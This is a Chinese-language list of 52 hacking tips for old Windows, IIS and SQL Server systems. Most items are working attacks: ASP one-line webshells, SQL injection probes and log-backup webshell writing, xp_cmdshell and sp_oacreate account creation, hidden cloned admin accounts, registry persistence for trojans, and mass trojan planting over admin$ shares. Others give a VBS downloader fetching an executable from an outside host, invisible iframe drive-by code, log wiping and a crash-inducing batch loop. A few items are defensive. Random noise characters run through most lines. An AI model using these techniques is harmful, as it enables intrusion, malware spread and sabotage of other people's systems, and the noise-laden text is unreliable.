Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 Q" I8 g$ |' I6 @" M# I' H
cacls C:\windows\system32 /G hqw20:R/ J) f: Q" z |) v3 [8 t7 q
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; I$ O8 Z$ b7 g& X9 K6 [
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F1 g1 r, ^) I" m0 b# J% j( c& b" S
3 T- h: d7 x9 \' C" X1 z2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 p- L# R( Y$ |$ ~6 P$ i8 a7 ?6 ]! }# Z% R8 P C! \5 I' w' K
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
6 a' i1 a1 ]$ }3 n( h3 X d0 k2 J8 `/ O2 n' V
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
( x) e: h% h: J8 y' \0 G( e
) h- w# C2 J8 n# M; V/ ^9 m5、利用INF文件来修改注册表
: n: Z4 w( {! |1 k4 h+ b, h[Version]* C! `5 v1 ?5 q( T6 N* r
Signature="$CHICAGO$"% Z5 @; K; b- u+ u1 U
[Defaultinstall]# u1 o' J' {* d' x v
addREG=Ating
. W# U# f# [: a& S0 D[Ating]
6 R. R: ]0 k: k; O* k% xHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 [1 g8 L' ?) A3 P
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:2 b9 ?- r3 N% O- H, G3 ^" X
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
8 x% {# s. g* L" ^其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
0 u, {/ l( s9 K9 qHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 w2 n# \# z0 p4 y2 U8 ~" E
HKEY_CURRENT_CONFIG 简写为 HKCC
x; K' u) N: S3 k3 k) {7 Q1 k0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值2 {, B# D* g* ]% O( d( G" `
"1"这里代表是写入或删除注册表键值中的具体数据$ d2 Y2 Z4 w* h2 r1 h2 o
6 s- r5 l$ n8 _' t( n1 z# r6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,7 o* H0 R L) F( v
多了一步就是在防火墙里添加个端口,然后导出其键值
$ v; }0 j5 K9 D( R( X[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
, K \! ^4 v3 p5 m6 o: ^0 G2 ?/ L* r
9 D+ q, f* K% F( X! @! _7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽& ^& Y5 n& m: Y/ r
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。0 C# W2 i: I! s5 f6 S+ ]; b5 O
2 a( l1 g) g0 N' G/ o3 ^+ p8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# k( d1 z1 B6 B; U! a0 ]# B
0 b% k k2 _* q2 K0 a, I, g9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,8 G1 {5 }6 M: {6 ~9 F; x2 o
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
, Z0 n; W8 V% p0 l, o; ^4 F {& _, Y$ ` A4 |* s& C
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
' H% V* s9 q0 a$ u2 ? \* w
, `9 |( w5 z) j' _ r: J. y& P0 I11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,: U: G7 r$ q; u: h( | y# h0 ?7 m
用法:xsniff –pass –hide –log pass.txt
& j! g- P8 f/ W& f- u
6 f+ S, `2 c5 a8 X12、google搜索的艺术
, I% S, ]7 E8 ~! a搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”+ [" Y% U+ ^( V. j
或“字符串的语法错误”可以找到很多sql注入漏洞。
" L$ N* T, y) G; Z9 R- L, ^( L5 o- ~% I
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。( s! u. u( t- D1 y$ S6 x
, a# `" F* d. t% {; S& ~14、cmd中输入 nc –vv –l –p 1987
: }9 f% e7 ^5 P" f6 I做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃# s o2 T4 H ?4 e+ X. O; f( Z K) |" \
V/ d* A/ ^& D7 w
15、制作T++木马,先写个ating.hta文件,内容为8 O, I4 }9 D% g6 q
<script language="VBScript">
6 y4 z b8 ?6 z6 Q2 K/ e# k' v$ |set wshshell=createobject ("wscript.shell" )
6 D( S! X7 Y0 W4 ^3 f9 v" ua=wshshell.run("你马的名称",1)
7 _! E) R6 e* O" S- T% Q, Twindow.close
6 G( T! k0 D i9 H</script>
% o5 L1 R5 h+ j9 j1 a再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* C. N- {! I% R3 v/ c
0 z+ D" M( L/ s, \& F( e16、搜索栏里输入
1 x. X J' Q4 Z) l) h. o* v关键字%'and 1=1 and '%'='
3 H; P# D; Z' _. X/ I关键字%'and 1=2 and '%'='
, l+ { V5 I) J& r) U* b6 Y比较不同处 可以作为注入的特征字符# u. E1 c. H; p# P. D7 T
2 q4 ?' Y9 V- {7 n) P17、挂马代码<html>
& D7 _6 t- D/ B, c<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>% {' X g' [' Y8 s$ V6 U9 d p
</html>& W' r* _7 h' M+ r) l' ^/ `
/ G& l8 @5 C* Y) y+ Y- `/ Q18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
$ @, }6 |) q+ z2 \- o! \net localgroup administrators还是可以看出Guest是管理员来。 G1 \" R5 H# J' a, |
! ^1 k4 o$ `) m. M) f, E; y: J
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
, P* J# q' _* `* a& P用法: 安装: instsrv.exe 服务名称 路径
" N( H% T. L% w, ]1 e( R2 q" ?卸载: instsrv.exe 服务名称 REMOVE
% `. c% |+ ?; S7 T- V/ f2 |; i* U8 M% r! t
( t7 v! G; T9 @: R& p. G6 R
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
) u/ D% Q! ~$ U' r! Y不能注入时要第一时间想到%5c暴库。- _" r. C4 S& }# | `9 r- {8 \
# C8 y5 {5 i' U! H
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
& G0 z! m |' h" i) o+ ?5 E
% W* I8 v% v9 T v23、缺少xp_cmdshell时
1 Y8 k5 Y3 S" ]+ U& A; } s尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
& a+ y* M) D: i" H3 n: X2 L假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 a/ e; |- Z3 v$ I9 Y# qdeclare @o int
0 O* g* k* Q' w# vexec sp_oacreate 'wscript.shell',@o out
& Q/ `1 J% M7 z, M3 k3 Q' vexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员" `# u; w( [ a+ R, G( n
6 i7 ]3 L7 \- |7 J9 r
24.批量种植木马.bat: v8 Q# g9 ~7 G) C7 g& g- S9 Z8 g
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中$ a4 {2 \( R R" F/ \3 \8 [4 `
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' C: A2 E; p `1 h9 ^0 i* F/ l) T
扫描地址.txt里每个主机名一行 用\\开头& R2 G# ~+ u9 Q @8 p( Y
7 D% _/ Y+ p" A: N
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, S* U7 h% N- \3 q( @; `4 A7 _( \- C
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; p2 \8 H& ]8 i/ U) p将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
+ i& O5 P. |1 c6 s0 I! ^$ `.cer 等后缀的文件夹下都可以运行任何后缀的asp木马 ~" p' |4 [$ C V
' f/ }2 a4 k4 O9 J, D" ^% ]9 k
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP- W$ k. P) x1 t- k/ @7 V
然后用#clear logg和#clear line vty *删除日志
" f5 a9 A( K+ c8 a+ K& l
5 \5 f6 p7 q$ W! V X! U( G0 w28、电脑坏了省去重新安装系统的方法
+ B; o: ?! y1 g% B" O纯dos下执行,' z6 v3 k7 }( w
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. }' W( c& L) T" n$ B$ C8 G. z2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 J# E/ ?0 y: Z% J/ D* E
, ^- b: \2 `$ f' n" n29、解决TCP/IP筛选 在注册表里有三处,分别是:
" \: g9 S8 `, ?5 w* `8 g2 IHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip$ j- g7 f* m6 v4 b' K
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 c& i1 V9 ?, F P& {3 UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. X# W- j8 l2 v' i- K8 g& Q( b
分别用2 W* D" | _* }. H4 G# g* r
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& o N! b, t- q( Dregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 v4 u% \% K* Bregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' V, D) s) J) M; R
命令来导出注册表项! u: C% U8 J3 d) S# k
然后把三个文件里的EnableSecurityFilters"=dword:00000001,# W3 k; x( E* k! h# d! f I+ P# l8 O
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: K( t/ r! i" a$ B
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。: N9 Y7 L0 }+ K* G: h
3 u" ~+ e0 g* Z: g# i) `30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 `: s6 P9 |& Z: n1 KSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 i! r; p# w; S: a9 X6 H
8 y+ f% w6 }) O31、全手工打造开3389工具/ i1 {) V* \: n/ c
打开记事本,编辑内容如下:" f9 i/ R) L1 D9 W1 {
echo [Components] > c:\sql# j% C% f7 @/ L% b6 e9 [# ?
echo TSEnable = on >> c:\sql
6 _' R; n! M+ Q. Fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q6 r5 X2 t, V" B
编辑好后存为BAT文件,上传至肉鸡,执行
0 y. j& J7 k% o8 V' G% \, X' e0 `4 A
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马& \4 S% h! P# J e# n
/ x, o' T5 }7 P$ p. k
33、让服务器重启
' P/ C7 }% E4 L+ w% N写个bat死循环:* G8 }$ W9 Q# G) R4 \& p' D
@echo off
+ G4 V. \0 q& `:loop1
5 \8 K1 M3 O7 r) Pcls: p9 Y P: a ^; F* X `7 L
start cmd.exe/ h, j5 g! \: {# J
goto loop1
; ?- p$ `- T9 V保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启1 E7 A, h5 i$ q
1 y: j3 Q1 Q9 U4 _1 I- S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你," \& D/ ?( K# B% E& b! C) d
@echo off2 H+ Z5 u/ b0 r. Z) I
date /t >c:/3389.txt
. H# E- i! Q" ~" R& c7 r& G rtime /t >>c:/3389.txt# i! ^4 U: z- C& K+ g1 H
attrib +s +h c:/3389.bat) ]" K7 A% d+ u( l* l
attrib +s +h c:/3389.txt
7 I( `' C& a% @* r3 P) ~/ I$ P0 \netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, T+ N* q! V; ~6 U( d# B
并保存为3389.bat, m& A C: N: t- j
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
; X7 w4 [0 p4 b( m
/ @7 f+ C/ }) N( r9 X9 D0 x& I1 `35、有时候提不了权限的话,试试这个命令,在命令行里输入:
; Z. t2 F7 y- Y8 a; estart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
! I1 D" M% V: p% H输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。: Y, h% u7 k; D; j
6 p) j9 [# O" k. Y+ ] r36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 v$ r: w9 v" }& h9 lecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址- g$ l$ Q$ Y. R& x) _ g
echo 你的FTP账号 >>c:\1.bat //输入账号2 E. W o! V6 V0 P# J
echo 你的FTP密码 >>c:\1.bat //输入密码
[8 X4 V7 Y, P5 F7 b6 E4 Hecho bin >>c:\1.bat //登入
7 ]. m+ [) h- X5 q, p/ c, O* ~echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
8 U# \- y J1 A( a* A$ Aecho bye >>c:\1.bat //退出4 {2 K; z/ G+ W0 Q0 a
然后执行ftp -s:c:\1.bat即可
8 h, E$ \: N5 }" c
3 W7 H) o. B% n5 W+ c. i9 T! i37、修改注册表开3389两法4 Z8 z: D6 P2 U+ k" V- n
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表% K7 R" h# A$ t( p; L
echo Windows Registry Editor Version 5.00 >>3389.reg
q0 W5 k$ u3 h6 F, d& N5 O: {: recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg, A6 m* @6 L' t- G. K
echo "Enabled"="0" >>3389.reg
% m. ?# @+ W9 i7 aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* B9 c; |. S. n% PNT\CurrentVersion\Winlogon] >>3389.reg+ j% G! O8 h, y; N8 Y5 R
echo "ShutdownWithoutLogon"="0" >>3389.reg* a$ G1 A3 {+ g) `8 R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]$ b8 b" y A" _2 B
>>3389.reg p K4 }* w$ z) z& [/ K$ ~
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% c' o5 V; I2 Q& \7 R+ W6 q6 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]. J; L, S" R; A. I; K# R
>>3389.reg
, _7 B. R: l6 {1 F+ U8 yecho "TSEnabled"=dword:00000001 >>3389.reg( F% S4 k$ o& ~0 S' H' t' }( X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
# c. o5 c; w& T) T, ?echo "Start"=dword:00000002 >>3389.reg
# }8 @3 X8 g( S; E9 ^% G6 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 s1 G G/ r, h. @6 a
>>3389.reg
, G# @- g. j1 u, [& [echo "Start"=dword:00000002 >>3389.reg
% Y: Q& S4 \0 w5 g6 necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 n0 |+ C3 V8 o' _3 @) uecho "Hotkey"="1" >>3389.reg1 w: r( i* r$ E- k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 j7 I5 }5 H1 \$ j1 K4 N( s" i1 dServer\Wds\rdpwd\Tds\tcp] >>3389.reg
, \) b$ q; Q3 t, Pecho "PortNumber"=dword:00000D3D >>3389.reg
/ B% g2 R% H# Q0 ~( v- H2 G9 p4 cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 [& g* t) M7 v) A3 Q0 u2 q
Server\WinStations\RDP-Tcp] >>3389.reg- m8 J/ ^6 r! a9 h5 s
echo "PortNumber"=dword:00000D3D >>3389.reg
) B1 O+ w- [ r' E3 D/ g, k把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) r- w( X/ F+ r" _(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
+ M' I9 n" ?7 h9 V) y4 e因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
1 p5 P+ q) C8 e& h, Y$ m. D(2)winxp和win2003终端开启1 o# |) A( S+ b9 b7 p
用以下ECHO代码写一个REG文件:6 ]7 k8 | y( t4 b) e
echo Windows Registry Editor Version 5.00>>3389.reg
) _* ~$ `9 t' o- t2 G# A' _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 Z9 O6 z. I0 E6 x, j. D+ f, IServer]>>3389.reg! J0 `' s5 b! w& h; o
echo "fDenyTSConnections"=dword:00000000>>3389.reg
1 c: P6 L3 W7 Q5 @$ `7 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 j. D1 e o' `- `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
& T+ V: h* ~& p2 l$ _echo "PortNumber"=dword:00000d3d>>3389.reg
+ f, N- g; U! `; p$ oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 A2 b8 a2 r" j* B
Server\WinStations\RDP-Tcp]>>3389.reg2 l& g* F: U- r0 g
echo "PortNumber"=dword:00000d3d>>3389.reg
# y5 b3 p; i, m) Z: Q# `8 u然后regedit /s 3389.reg del 3389.reg2 S1 r: M7 d* v8 m$ \2 S
XP下不论开终端还是改终端端口都不需重启: a: a. ^/ @$ z
3 Y- O, C' M) w, q* T
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
; t. z5 U) ?0 R# h" @用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 n- N5 }$ ^, Z# i8 T A- T) F. _4 ?, v3 d3 w. z( v& U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 I" ?; R) X* V* g: R' L% V(1)数据库文件名应复杂并要有特殊字符
' c* p! ^, u4 n" s$ M$ ]/ r6 v. _(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
; Q$ f0 \, P* {4 W; s, {将conn.asp文档中的
) i: ?" F2 T1 O. C( f6 [# uDBPath = Server.MapPath("数据库.mdb"). a2 B8 b7 |# H9 Y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 g8 h5 q. D& w. c
/ b; b; v. {5 Y) ^" e修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置9 |# d9 D! ]) E/ A4 M9 N
(3)不放在WEB目录里2 [6 g8 W7 Z/ D9 j
0 A+ U2 v1 D+ i+ \& R) i- O, `40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉0 N, o: o0 H+ A x: N" q
可以写两个bat文件. S8 g* ?0 }. z# @& y
@echo off
- `, B/ k P/ k( w+ Q+ A! p& ]& c: u@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ J, L1 B4 c0 a" f; P, N9 d
@del c:\winnt\system32\query.exe
7 x" o7 X2 i" ^/ K- m1 z+ k) j@del %SYSTEMROOT%\system32\dllcache\query.exe
( R/ Y- ] m" R! _@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的/ T& e6 p- z" N& D
/ x; r4 n# E$ g% I' i, r
@echo off
& M# _0 G2 w2 ]8 I@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe9 R) X0 }: G5 w& f0 d
@del c:\winnt\system32\tsadmin.exe4 P0 V* C J% i; j! E
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex5 }$ R: T, H# U
# } @! b- R* C8 `
41、映射对方盘符3 s9 m* H4 w1 Z4 ^, N
telnet到他的机器上,% `" r7 }" ?0 O% `& Y m
net share 查看有没有默认共享 如果没有,那么就接着运行
4 j' L# d' u9 O1 Tnet share c$=c:
8 C- F7 o; Y) _+ S& W( Rnet share现在有c$; j; a1 [: L* u# l; P B/ Q; B. E
在自己的机器上运行: L5 ^- r6 v, @5 q% c
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
P* ]3 H9 l2 X( d& \" o$ k: X. Y
) J! o: O3 K! x4 v+ E7 g42、一些很有用的老知识) L$ j8 l) |* T" W8 F& F
type c:\boot.ini ( 查看系统版本 )
5 `7 F9 q1 S3 v( u' X6 h% Cnet start (查看已经启动的服务). p- K1 z3 _4 O; g: b& S
query user ( 查看当前终端连接 )
0 p6 u1 W) e2 I- nnet user ( 查看当前用户 )
; u4 d, `5 m, x" i& c4 b3 \net user 用户 密码/add ( 建立账号 )" |; ^, ~' z8 d1 D
net localgroup administrators 用户 /add (提升某用户为管理员)
, p/ c( [1 r% u5 ^3 b, A( cipconfig -all ( 查看IP什么的 )
; |: L1 U, y2 H9 @7 fnetstat -an ( 查看当前网络状态 )+ E e4 D3 i q* M
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
; j* `4 F3 d; }5 Q; \4 s克隆时Administrator对应1F4
2 x8 q+ y1 C" g) uguest对应1F5
O# j" u' f4 A W0 Btsinternetuser对应3E8* l0 ?. T- B4 B4 v
# i8 b( b/ a- y
43、如果对方没开3389,但是装了Remote Administrator Service( A$ Q( d. s& m3 I$ H9 f
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ W' `! @3 p7 ?5 ?' \7 P8 a
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
2 n& K+ X G# _! I! a+ i先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" ]: c) G% u0 H9 E8 o4 K1 F# c0 t! d3 c. j4 r, }1 O& j
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
" x- N/ {6 v+ A, ^, j9 f本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
" \# X# B. J9 k1 q0 x4 \- q. X. y8 t0 T
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)6 g# t A' H, q) {1 r( R
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# O( Z* t4 X' n6 Y H0 C5 Q0 @^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ T1 K# S+ l' V1 b0 T, _$ ]CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: M7 u( r& V& o. F1 k
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs. e2 x2 G; N, j2 l5 Q- w
(这是完整的一句话,其中没有换行符); Q$ n" J4 Q. q" Q0 u3 m* K
然后下载:
; {& x m: p+ u# Mcscript down.vbs http://www.hack520.org/hack.exe hack.exe
: [" h2 h( J8 E. u1 J" W2 ~& [" g! H. |9 d9 l6 |9 r0 X9 H
46、一句话木马成功依赖于两个条件:+ r# }5 t8 f# f! ^3 Z0 A
1、服务端没有禁止adodb.Stream或FSO组件' F5 J2 H7 T7 ^3 E' n: ]
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
5 {6 K* G$ e( ?
8 p: q' B; f9 Q' e: @5 e8 m/ w47、利用DB_OWNER权限进行手工备份一句话木马的代码:
( p' r4 E2 Q+ g- X5 B6 W;alter database utsz set RECOVERY FULL--( N- V: a. e- q% s: H* T, k
;create table cmd (a image)--
) Q7 G$ X7 e# B;backup log utsz to disk = 'D:\cmd' with init--
) m& k8 f" ]! x* h/ [2 l$ j;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--( C- c- M/ m | z- h
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
4 F7 m7 k( j8 W5 Z4 F. z注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
, O2 q8 A8 q3 }5 h% N8 @9 @2 y+ T
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
8 @( G$ c# Y: v7 ]
: Y2 A4 U, ?& X用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
8 _6 d' ]$ T7 d" @5 H k- V7 v/ ~: |. u所有会话用 'all'。$ _ h; W5 Z) Y3 s f1 Q
-s sessionid 列出会话的信息。
9 v- Z- v/ \1 {-k sessionid 终止会话。
* t" F7 @. h* |( S' L2 N, E, U% _-m sessionid 发送消息到会话。
' y, V1 N8 o0 G% a% X% {! n; m' W
, s6 _+ K1 V" P4 ~config 配置 telnet 服务器参数。
k2 T0 s: r+ V% O- j+ i
+ h4 R, Q' B6 L7 R; }9 @7 tcommon_options 为:
" v2 z1 P2 _+ N1 J- n1 {( |-u user 指定要使用其凭据的用户
6 G- d& O, Q' R6 d% \3 |-p password 用户密码
; j( f" t* i2 [2 ^% _' E& R
1 p d3 S' `0 V/ D& qconfig_options 为:
) r6 o4 F- E0 Kdom = domain 设定用户的默认域
1 l5 F1 S8 U: @. j! j& ^ctrlakeymap = yes|no 设定 ALT 键的映射
' d0 E1 W# m& K% ?timeout = hh:mm:ss 设定空闲会话超时值
* i1 O7 G4 q) ctimeoutactive = yes|no 启用空闲会话。
7 l) i) a& D+ |4 {1 O% U7 u0 Mmaxfail = attempts 设定断开前失败的登录企图数。
6 f" ]/ k6 b/ w; w) G+ Zmaxconn = connections 设定最大连接数。/ w2 l- ~) B5 X6 t& L) G( G
port = number 设定 telnet 端口。6 K5 G9 P* \- L5 e& J* N
sec = [+/-]NTLM [+/-]passwd$ a" Z, H; D2 [: d& S
设定身份验证机构
; y1 Q+ ^! V8 O* l0 [fname = file 指定审计文件名。4 G0 t/ Z. T8 a3 B0 F, A g
fsize = size 指定审计文件的最大尺寸(MB)。
& b+ F. g5 ]1 | K, vmode = console|stream 指定操作模式。
7 O+ Z' |0 B8 {8 H' e( b2 T6 ^auditlocation = eventlog|file|both9 y% H7 P( k; D# _
指定记录地点
9 g& P& ^& a3 naudit = [+/-]user [+/-]fail [+/-]admin
9 m& Z$ t" b+ ?' t
( h* ~) ^- U) U8 A0 [/ |2 }4 F49、例如:在IE上访问:
& u5 a: G5 A4 H. m7 k# H7 a5 Zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
4 a' C/ T q1 S# i" Phack.txt里面的代码是:+ [3 h! Y/ r1 I" Z& Z0 `9 g
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">0 i. b0 T: w8 R" {
把这个hack.txt发到你空间就可以了!& h8 n+ D% r9 d& Z* X
这个可以利用来做网马哦!+ y( s+ ^( {5 G0 Z. \8 r
) w& G& q d* ]8 z; S$ m
50、autorun的病毒可以通过手动限制!, V0 l0 F7 \& l5 [
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 g3 U8 x, _2 W& E4 @* E# S2,打开盘符用右键打开!切忌双击盘符~2 p, `# _# w) I2 }
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
6 l; O( _, Y" B: q! X+ e, ~" {5 X8 {6 `( E0 k' W
51、log备份时的一句话木马:
7 C; g3 A' N% @. ^a).<%%25Execute(request("go"))%%25>
: O* H# D, f, i5 d: T* Lb).<%Execute(request("go"))%>/ c7 Q, |0 [. J4 V M9 |) f* h
c).%><%execute request("go")%><%
& ^' M' u3 |: B0 K) L2 D& Rd).<script language=VBScript runat=server>execute request("sb")</Script>
0 d1 c8 s: v _& ]5 N% M) se).<%25Execute(request("l"))%25>
* ^3 ^ i; o& d3 \: Z7 Af).<%if request("cmd")<>"" then execute request("pass")%>5 V p. T& B- }" g/ \3 v. e$ [0 W% \
- T/ M2 P [0 o2 ?, _52、at "12:17" /interactive cmd) @! \5 n/ {& X: Q7 _2 v, ^
执行后可以用AT命令查看新加的任务
9 n' U6 q7 x6 j8 T7 ]5 H, h用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
